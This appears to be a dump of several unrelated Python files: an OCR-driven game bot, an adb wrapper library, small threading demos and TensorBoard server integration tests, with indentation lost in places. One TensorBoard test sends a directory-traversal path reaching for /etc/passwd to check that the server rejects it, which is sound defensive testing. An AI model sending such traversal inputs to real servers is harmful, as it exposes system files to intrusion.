y = results["top"][i] + (results["height"][i]/2)
# and then click at this position
self.convert_and_click(x, y, self.questlist_rect)
detection = True
break
if not detection:
return self.check_for_complete()
else:
return True
def check_for_complete(self):
image = self.complete_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.white_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Com" in results["text"][i]:
x = results["left"][i] + (results["width"][i]/2)
y = results["top"][i] + (results["height"][i]/2)
self.convert_and_click(x, y, self.next_rect)
detection = True
break
if not detection:
return self.check_for_xprompt()
else:
return True
def check_for_xprompt(self):
image = self.xprompt_wincap.get_screenshot()
image = self.vision.apply_hsv_filter(
image, self.blue_text_filter)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
detection = False
for i in range(0, len(results["text"])):
if "Press" in results["text"][i]:
pydirectinput.keyDown("x")
time.sleep(0.1)
pydirectinput.keyUp("x")
detection = True
break
if not detection:
return False
else:
return True
class Follower():
def __init__(self, margin=2) -> None:
self.pressed_keys = []
self.last_press = {
"right": time.time() - 5,
"up": time.time() - 5,
"down": time.time() - 5,
"left": time.time() - 5
}
self.relx = 0
self.rely = 0
self.margin = margin
def release_all_keys(self):
for key in self.pressed_keys:
CustomInput.release_key(CustomInput.key_map[key], key)
def navigate_towards(self, x, y):
self.relx = x
self.rely = y
if self.relx > self.margin:
# Check if opposite key held down
if "left" in self.pressed_keys:
self.pressed_keys.remove("left")
CustomInput.release_key(CustomInput.key_map["left"], "left")
# Check that wasn't very recently pressed
if time.time() - self.last_press["right"] < 0.21:
pass
# Check that not already being held down
elif "right" not in self.pressed_keys:
self.last_press["right"] = time.time()
self.pressed_keys.append("right")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["right"], "right")
elif self.relx < -self.margin:
# Check if opposite key held down
if "right" in self.pressed_keys:
self.pressed_keys.remove("right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
# Check that wasn't very recently pressed
if time.time() - self.last_press["left"] < 0.21:
pass
# Check that not already being held down
elif "left" not in self.pressed_keys:
self.last_press["left"] = time.time()
self.pressed_keys.append("left")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["left"], "left")
else:
# Handling for case where = 0, need to remove both keys
if "right" in self.pressed_keys:
self.pressed_keys.remove("right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
if "left" in self.pressed_keys:
self.pressed_keys.remove("left")
CustomInput.release_key(CustomInput.key_map["left"], "left")
# Handling for y-dir next
if self.rely > self.margin:
# Check if opposite key held down
if "down" in self.pressed_keys:
self.pressed_keys.remove("down")
CustomInput.release_key(CustomInput.key_map["down"], "down")
# Check that wasn't very recently pressed
if time.time() - self.last_press["up"] < 0.21:
pass
# Check that not already being held down
elif "up" not in self.pressed_keys:
self.last_press["up"] = time.time()
self.pressed_keys.append("up")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["up"], "up")
elif self.rely < -self.margin:
# Check if opposite key held down
if "up" in self.pressed_keys:
self.pressed_keys.remove("up")
CustomInput.release_key(CustomInput.key_map["up"], "up")
# Check that wasn't very recently pressed
if time.time() - self.last_press["down"] < 0.21:
pass
# Check that not already being held down
elif "down" not in self.pressed_keys:
self.last_press["down"] = time.time()
self.pressed_keys.append("down")
# Hold the key down
CustomInput.press_key(CustomInput.key_map["down"], "down")
else:
# Handling for case where = 0, need to remove both keys
if "up" in self.pressed_keys:
self.pressed_keys.remove("up")
CustomInput.release_key(CustomInput.key_map["up"], "up")
if "down" in self.pressed_keys:
self.pressed_keys.remove("down")
CustomInput.release_key(CustomInput.key_map["down"], "down")
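# A hedged sketch of how Follower is meant to be driven: feed it the target's
# relative x/y offset every frame and it debounces the arrow keys itself. The
# offset source (get_offset_to_target) is a placeholder for whatever detection
# routine supplies the target position:
def _demo_follow_loop(get_offset_to_target, duration=5.0, margin=2):
    follower = Follower(margin=margin)
    end_time = time.time() + duration
    try:
        while time.time() < end_time:
            relx, rely = get_offset_to_target()
            follower.navigate_towards(relx, rely)
            time.sleep(0.05)
    finally:
        # Always let go of any held arrow keys, even on an exception
        follower.release_all_keys()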
if __name__ == "__main__":
time.sleep(2)
with open("gamename.txt") as f:
gamename = f.readline()
# start = time.time()
# BotUtils.detect_xprompt(gamename)
# print("Time taken: {}s".format(time.time()-start))
# BotUtils.move_diagonal(749, 615, 22.5)
BotUtils.try_toggle_map_clicking(gamename)
|
__init__.py
|
from __future__ import print_function
import ctypes
import inspect
import shlex
import tempfile
import threading
from queue import Queue, Empty
from typing import List, Callable, Optional
from subprocess import (
    CalledProcessError,
    call,
    Popen,
    PIPE,
)
__author__ = 'Simon Lee, Viktor Malyi'
__email__ = 'leetsong.lc@gmail.com, v.stratus@gmail.com'
__version__ = '1.3.0'
Thread = threading.Thread
ThreadError = threading.ThreadError
#########################################
# Utilities
#########################################
def _underline(s: str) -> str:
"""
Underline a string
:param s: string to be underlined
:return: underlined string
"""
return '\033[4m' + s + '\033[0m'
def _from_proc_output(output: bytes) -> str:
"""
Convert proc output from bytes to str, and trim heading-
and tailing-spaces
:param output: output in bytes
:return: output in str
"""
return str(output, encoding='utf-8').strip(' \t\n')
class NonBlockingReader:
class TimeoutException(Exception):
pass
def __init__(self, stream):
self._stream = stream
self._queue = Queue()
self._thread = Thread(target=self._run)
self._thread.start()
def empty(self):
return self._queue.empty()
def readline(self, timeout=None):
"""
        Read one line within the given time limit
        :param timeout: seconds to wait for a line; None makes the read non-blocking
        :return: the next line, or None once the stream is exhausted;
                 raises TimeoutException if no line arrives in time
"""
try:
return self._queue.get(block=timeout is not None, timeout=timeout)
except Empty:
if self._thread.is_alive(): # actually empty, and timeout
raise self.TimeoutException()
else: # thread is not alive, read done
return None
def close(self):
if self._thread.is_alive():
self._thread.join()
def _run(self):
for line in self._stream:
self._queue.put(line)
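# A minimal usage sketch for NonBlockingReader (illustrative only): wrap a
# subprocess' stdout and poll it with a short timeout so the caller never
# blocks indefinitely on a quiet stream. The example command is arbitrary.
def _demo_nonblocking_reader(cmd=('adb', 'devices')):
    proc = Popen(list(cmd), stdout=PIPE)
    reader = NonBlockingReader(proc.stdout)
    lines = []
    while True:
        try:
            line = reader.readline(timeout=0.1)  # wait up to 100 ms per poll
        except reader.TimeoutException:
            continue  # nothing yet, keep polling
        if line is None:  # stream exhausted and reader thread finished
            break
        lines.append(_from_proc_output(line))
    reader.close()
    return lines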
#########################################
# Pre-declaration
#########################################
class Adb:
pass
#########################################
# Global Options
#########################################
AdbGlobalOption = Callable[[Adb], List[str]]
class AdbGlobalOption_s(AdbGlobalOption):
    # TODO: not sure yet how to silence the type-checker warning about subclassing Callable[...]
def __call__(self, adb: Adb) -> List[str]:
return ['-s', adb._serial] if adb._serial is not None else []
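# The GLOBAL_OPTIONS mechanism lets each option object contribute argv
# fragments based on the Adb instance's state (see Adb.GLOBAL_OPTIONS below).
# A hedged sketch of another option in the same style; the `_port` attribute is
# hypothetical and nothing in this module sets or registers it:
class AdbGlobalOption_P(AdbGlobalOption):
    def __call__(self, adb: Adb) -> List[str]:
        port = getattr(adb, '_port', None)
        return ['-P', str(port)] if port is not None else []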
#########################################
# Adb Commands
#########################################
class AdbCommand:
SHELL = 'shell'
EXEC_OUT = 'exec-out'
LOGCAT = 'logcat'
PULL = 'pull'
PUSH = 'push'
UNINSTALL = 'uninstall'
INSTALL = 'install'
DEVICES = 'devices'
FORWARD = 'forward'
REVERSE = 'reverse'
GET_SERIALNO = 'get-serialno'
WAIT_FOR_DEVICE = 'wait-for-device'
KILL_SERVER = 'kill-server'
START_SERVER = 'start-server'
GET_STATE = 'get-state'
REBOOT = 'reboot'
ROOT = 'root'
SYNC = 'sync'
EMU = 'emu'
VERSION = 'version'
BUGREPORT = 'bugreport'
##########################################
# Adb Poll Command Callback
##########################################
# An AdbPollCommandCallback is a function which accepts
# (whether timeout, the output of the command) as
# inputs, and returns a flag to terminate the execution
# (True for terminating, and o.w. False)
AdbPollCommandCallback = Callable[[bool, str], bool]
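# Example of a conforming AdbPollCommandCallback (illustrative): collect every
# non-timeout line into `sink` and ask the poller to stop once `marker` is seen.
def _make_stop_on_marker_callback(marker: str, sink: List[str]) -> AdbPollCommandCallback:
    def callback(timed_out: bool, line: str) -> bool:
        if timed_out:
            return False           # keep polling on a timeout tick
        sink.append(line)
        return marker in line      # True terminates the running command
    return callback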
#########################################
# Adb Implementation
#########################################
class Adb:
EXECUTABLE = 'adb'
GLOBAL_OPTIONS: list = [
AdbGlobalOption_s(),
]
def __init__(self, log_command=True, log_output=True):
"""
Adb is a python interface for adb
:param log_command: whether enable logging the invoked adb command
:param log_output: whether enable logging the output of the invoked adb command
"""
self._serial = None
self._is_log_output_enabled = log_output
self._is_log_command_enabled = log_command
self._reset()
def enable_logging_command(self, enabled: bool = True):
"""
Enable or disable logging command
:param enabled: enable or not
:return:
"""
self._is_log_command_enabled = enabled
return self
def enable_logging_output(self, enabled: bool = True):
"""
Enable or disable logging output
:param enabled: enable or not
:return:
"""
self._is_log_output_enabled = enabled
return self
def is_log_output_enabled(self):
"""
        Whether logging of command output is enabled
        :return: True if output logging is enabled
"""
return self._is_log_output_enabled
def is_log_command_enabled(self):
"""
        Whether logging of the invoked commands is enabled
        :return: True if command logging is enabled
"""
return self._is_log_command_enabled
def s(self, serial):
"""
        Set the global option -s <serial> for subsequent commands without
        marking this instance as connected
        :param serial: serial number of the target device/emulator
:return: self
"""
self._serial = serial
return self
def is_connected(self):
"""
Whether connected an emulator or a device
:return: True if connected
"""
return self._serial is not None
def connect(self, serial: str):
"""
Permanently connect to an emulator with serial
:param serial: <serial>
:return: self
"""
if self.is_connected():
            print('Error: already connected to %s' % self._serial)
return False
else:
self._serial = serial
return True
def disconnect(self):
"""
Disconnect from the connected devices/emulators
:return: True if successfully disconnected
"""
if self.is_connected():
self._serial = None
return True
else:
print('Error: no connection by far')
return False
def reconnect(self, serial: str):
"""
Reconnect to a new device/emulator
:param serial: serial no of the emulator/device
:return: True if successfully connected
"""
if self.is_connected():
self.disconnect()
return self.connect(serial)
def version(self):
"""
        Display the adb version
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.VERSION]
return self._exec_command(adb_sub_cmd)
def bugreport(self, dest_file: str = "default.log"):
"""
        Capture a bug report (dumpsys, dumpstate and logcat data) and write it to dest_file
        :param dest_file: path of the file the report is written to
        :return: result of _exec_command_to_file() execution
"""
adb_sub_cmd = [AdbCommand.BUGREPORT]
try:
dest_file_handler = open(dest_file, "w")
except IOError:
print("IOError: Failed to create a log file")
dest_file_handler = None
        # Check that a device is available before running this command, because
        # `adb bugreport` will wait for a device indefinitely and would never
        # return otherwise
if self._is_device_available():
result = self._exec_command_to_file(adb_sub_cmd, dest_file_handler)
return result, "Success: Bug report saved to: " + dest_file
else:
return 0, "Device Not Found"
def push(self, src: List[str], dest: str, opts: Optional[list] = None):
"""
Push object from host to target
:param src: list of paths to source objects on host
:param dest: destination path on target
:param opts: options
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.PUSH, *src, dest, self._convert_opts(opts)]
return self._exec_command(adb_sub_cmd)
def pull(self, src: List[str], dest: str, opts: Optional[list] = None):
"""
Pull object from target to host
:param src: list of paths of objects on target
:param dest: destination path on host
:param opts: options
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.PULL, *src, dest, self._convert_opts(opts)]
return self._exec_command(adb_sub_cmd)
def devices(self, opts: Optional[list] = None):
"""
Get list of all available devices including emulators
:param opts: list command options (e.g. ["-l"])
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.DEVICES, self._convert_opts(opts)]
return self._exec_command(adb_sub_cmd)
def logcat(self, args):
"""
Display logcat logs
:param args: arguments to logcat
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.LOGCAT]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def poll_logcat(self, args, callback: AdbPollCommandCallback, timeout: int):
"""
Display logcat logs
:param args: arguments to logcat
:param callback: callback to handle each line
:param timeout: timeout for polling
"""
adb_sub_cmd = [AdbCommand.LOGCAT]
adb_sub_cmd.extend(shlex.split(args))
try:
self._poll_cmd_output(adb_sub_cmd, timeout=timeout, callback=callback)
except CalledProcessError:
pass
def exec_out(self, cmd: str):
"""
Execute command until finished using exec-out on target
:param cmd: string shell command to execute
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.EXEC_OUT]
adb_sub_cmd.extend(shlex.split(cmd))
return self._exec_command(adb_sub_cmd)
def shell(self, cmd: str):
"""
Execute command until finished using shell on target
:param cmd: string shell command to execute
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.SHELL]
adb_sub_cmd.extend(shlex.split(cmd))
return self._exec_command(adb_sub_cmd)
def poll_out(self, cmd: str, callback: AdbPollCommandCallback,
timeout, shell=False):
"""
Execute command until finished using shell on target
:param cmd: string shell command to execute
:param callback: callback to handle each line
:param timeout: timeout for polling
:param shell: True for using shell else exec-out
:return: return code
"""
adb_sub_cmd = [AdbCommand.SHELL if shell else AdbCommand.EXEC_OUT]
adb_sub_cmd.extend(shlex.split(cmd))
return self._poll_cmd_output(adb_sub_cmd, timeout=timeout,
callback=callback)
def install(self, apk: str, opts: Optional[list] = None):
"""
Install *.apk on target
:param apk: string path to apk on host to install
:param opts: list command options (e.g. ["-r", "-a"])
:return: result of _exec_command() execution
"""
if opts is None:
opts = list()
adb_sub_cmd = [AdbCommand.INSTALL, self._convert_opts(opts), apk]
return self._exec_command(adb_sub_cmd)
def uninstall(self, app: str, opts: Optional[list] = None):
"""
Uninstall app from target
:param app: app name to uninstall from target (e.g. "com.example.android.valid")
:param opts: list command options (e.g. ["-r", "-a"])
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.UNINSTALL, self._convert_opts(opts), app]
return self._exec_command(adb_sub_cmd)
def forward(self, args):
"""
Forward local (host machine) port to remote (android device) port
:param args: arguments to forward
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.FORWARD]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def reverse(self, args):
"""
Reverse remote (android device) port to local (host machine) port
:param args: arguments to forward
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.REVERSE]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def reboot(self):
"""
Reboot the device
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.REBOOT]
return self._exec_command(adb_sub_cmd)
def root(self):
"""
Run adb using root user
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.ROOT]
return self._exec_command(adb_sub_cmd)
def get_serialno(self):
"""
Get serial number for all available target devices
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.GET_SERIALNO]
return self._exec_command(adb_sub_cmd)
def wait_for_device(self):
"""
Block execution until the device is online
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.WAIT_FOR_DEVICE]
return self._exec_command(adb_sub_cmd)
def sync(self):
"""
Copy host->device only if changed
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.SHELL, AdbCommand.SYNC]
return self._exec_command(adb_sub_cmd)
def emu(self, args):
"""
Run emulator commands
:param args: arguments to emu
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.EMU]
adb_sub_cmd.extend(shlex.split(args))
return self._exec_command(adb_sub_cmd)
def start_server(self):
"""
        Start the adb server daemon on the host
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.START_SERVER]
return self._exec_command(adb_sub_cmd)
def kill_server(self):
"""
        Kill the adb server daemon on the host
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.KILL_SERVER]
return self._exec_command(adb_sub_cmd)
def get_state(self):
"""
        Get the state of the device connected to adb
:return: result of _exec_command() execution
"""
adb_sub_cmd = [AdbCommand.GET_STATE]
return self._exec_command(adb_sub_cmd)
def _reset(self):
"""
Reset self
:return: None
"""
if not self.is_connected():
self._serial = None
def _prepare(self):
"""
Prepare for executable and global options
:return: [executable, ...global_options]
"""
p = [Adb.EXECUTABLE]
for gop in Adb.GLOBAL_OPTIONS:
p.extend(gop(self))
return p
def _is_device_available(self):
"""
        Private helper to check whether a device is available;
        intended for use only by functions inside this module
:return: True or False
"""
result = self.get_serialno()
if result[1].strip() == "error: no devices/emulators found":
return False
else:
return True
def _convert_opts(self, opts: Optional[list]):
"""
Convert list with command options to single string value
with 'space' delimiter
:param opts: list with space-delimited values
:return: string with space-delimited values
"""
return ' '.join(opts) if opts is not None else ''
def _exec_command(self, adb_cmd: list):
"""
Execute adb_cmd and get return code and output
        :param adb_cmd: adb command to execute, as a list of arguments
:return: (returncode, output)
"""
buf = []
def callback(timeout, line):
if timeout:
return False
buf.append(line)
return False
try:
self._poll_cmd_output(adb_cmd, timeout=0, callback=callback)
except CalledProcessError as e:
return e.returncode, e.stderr
return 0, ''.join(buf)
def _poll_cmd_output(self, adb_cmd: list, timeout: int = 0,
callback: AdbPollCommandCallback = lambda _, __: False):
"""
        Format the adb command and execute it; stdout is polled every
        `timeout` milliseconds and each fetched line is passed to `callback`
        :param adb_cmd: adb command to execute, as a list of arguments
        :param timeout: polling timeout in milliseconds
        :param callback: callback invoked for each output line or timeout tick
"""
t = tempfile.TemporaryFile()
final_adb_cmd = self._prepare()
for e in adb_cmd:
if e != '': # avoid items with empty string...
final_adb_cmd.append(e) # ... so that final command doesn't
# contain extra spaces
if self._is_log_command_enabled:
print(_underline('-> ' + ' '.join(final_adb_cmd) + '\n'))
proc = Popen(final_adb_cmd, stdout=PIPE, stderr=t) # binary output, 'cause no universal_newlines
reader = NonBlockingReader(proc.stdout) # binary reader
while True:
try:
binary_line = reader.readline(timeout / 1000) # read one binary line
except reader.TimeoutException:
if callback(True, ''): # callback to give opportunity for termination
proc.terminate()
break
continue
if binary_line is None: # done reading
rc = proc.poll() # check return code
if rc == 0: # succeeded
break
# failed, raise an exception
t.seek(0) # seek to 0 position of err
err = _from_proc_output(t.read())
reader.close()
t.close()
raise CalledProcessError(returncode=rc, cmd=' '.join(final_adb_cmd),
output=None, stderr=err)
try:
text_line = str(binary_line, encoding='utf-8') # convert to utf-8
except UnicodeDecodeError as e:
pass # ignored
else:
if callback(False, text_line):
proc.terminate()
break
reader.close()
t.close()
self._reset() # reset state after each command
def _exec_command_to_file(self, adb_cmd, dest_file_handler):
"""
Format pyadb command and execute it in shell and redirects to a file
:param adb_cmd: list pyadb command to execute
:param dest_file_handler: file handler to which output will be redirected
:return: 0 and writes shell command output to file if successful, otherwise
raise CalledProcessError exception and return error code
"""
t = tempfile.TemporaryFile()
final_adb_cmd = self._prepare()
for e in adb_cmd:
if e != '': # avoid items with empty string...
final_adb_cmd.append(e) # ... so that final command doesn't
# contain extra spaces
if self._is_log_command_enabled:
print('-> ' + ' '.join(final_adb_cmd) + '\n')
try:
call(final_adb_cmd, stdout=dest_file_handler, stderr=t)
except CalledProcessError as e:
raise e
finally:
t.close()
dest_file_handler.close()
self._reset() # reset state after each command
return 0
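# A hedged usage sketch of the Adb wrapper (not executed here; the serial
# number, package/apk names and shell command are placeholders):
def _demo_adb_usage():
    adb = Adb(log_command=True, log_output=False)
    rc, out = adb.devices(['-l'])        # every command returns (returncode, output)
    if rc == 0 and adb.connect('emulator-5554'):
        rc, release = adb.shell('getprop ro.build.version.release')
        rc, _ = adb.install('app-debug.apk', ['-r'])
        adb.disconnect()
    return rc, out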
if __name__ == '__main__':
adb = Adb(False, False)
def test_logcat():
from threading import Thread
interrupted = False
def on_logcat(timeout, line) -> bool:
if interrupted:
return True
if timeout:
return False
if line is None or line == '':
return False
print(line.strip())
return False
thread = Thread(target=lambda: adb.poll_logcat('-s DroidTrace', callback=on_logcat, timeout=0))
try:
thread.start()
thread.join()
except KeyboardInterrupt:
interrupted = True
thread.join()
print('Exit')
def test_succeeded_shell():
rc, msg = adb.shell('cat /data/local/tmp/mnky')
print(rc)
print(msg)
def test_failed_shell():
rc, msg = adb.shell('cat /dta/local/tmp/mnky')
print(rc)
print(msg)
def test_getevent():
def on_event(timeout, line) -> bool:
if timeout:
return False
if line is None or line == '':
return False
print(line.strip())
return False
adb.poll_out('getevent -tlq', callback=on_event, timeout=0, shell=False)
test_logcat()
|
testing1.py
|
# Python program to illustrate the concept
# of threading
# importing the threading module
import threading
def print_cube(num):
"""
function to print cube of given num
"""
for i in range(num):
print("Cube: {}\n".format(num * num * num))
def print_square(num):
"""
function to print square of given num
"""
for i in range(num):
print("Square: {}\n".format(num * num))
# creating thread
t1 = threading.Thread(target=print_square, args=[10, ])
t2 = threading.Thread(target=print_cube, args=[10, ])
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# wait until thread 1 is completely executed
t1.join()
# wait until thread 2 is completely executed
t2.join()
# both threads completely executed
print("Done!")
|
test.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 22:45:46 2020
@author: nicol
"""
import threading as mp
import time
# note: no global is needed here; the list is passed to the worker thread by reference
def main():
l = []
streamer = mp.Thread(target=stream_all, args=(l,))
streamer.daemon = True
streamer.start()
streamer.join()
print(l)
def stream_all(l):
l.append("hi")
return
main()
|
application_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import tempfile
import threading
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.platform import test
from tensorflow.python.summary import event_multiplexer
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.tensorboard.backend import application
class TensorboardServerTest(test.TestCase):
_only_use_meta_graph = False # Server data contains only a GraphDef
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
self.temp_dir = self._GenerateTestData()
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
plugins = {}
app = application.TensorBoardWSGIApp(
self.temp_dir, plugins, multiplexer, reload_interval=0)
self._server = serving.BaseWSGIServer('localhost', 0, app)
# 0 to pick an unused port.
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers=None):
"""Perform a GET request for the given path."""
if headers is None:
headers = {}
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': self.temp_dir})
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(
isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(
run_json,
{
'run1': {
'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
# if only_use_meta_graph, the graph is from the metagraph
'graph': True,
'meta_graph': self._only_use_meta_graph,
'run_metadata': ['test run'],
'tensors': [],
}
})
def testApplicationPaths_getCached(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/',): # TODO(jart): '/app.js' in open source
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(
response.getheader('Cache-Control'),
'private, max-age=3600',
msg=path)
connection.close()
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/data/runs', '/data/logdir',
'/data/scalars?run=run1&tag=simple_values',
'/data/scalars?run=run1&tag=simple_values&format=csv',
'/data/images?run=run1&tag=image',
'/data/individualImage?run=run1&tag=image&index=0',
'/data/audio?run=run1&tag=audio',
'/data/run_metadata?run=run1&tag=test%20run'):
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(response.getheader('Expires'), '0', msg=path)
response.read()
connection.close()
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = graph_pb2.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
response = self._get('/data/individualImage?run=run1&tag=image&index=0',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), None)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = config_pb2.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
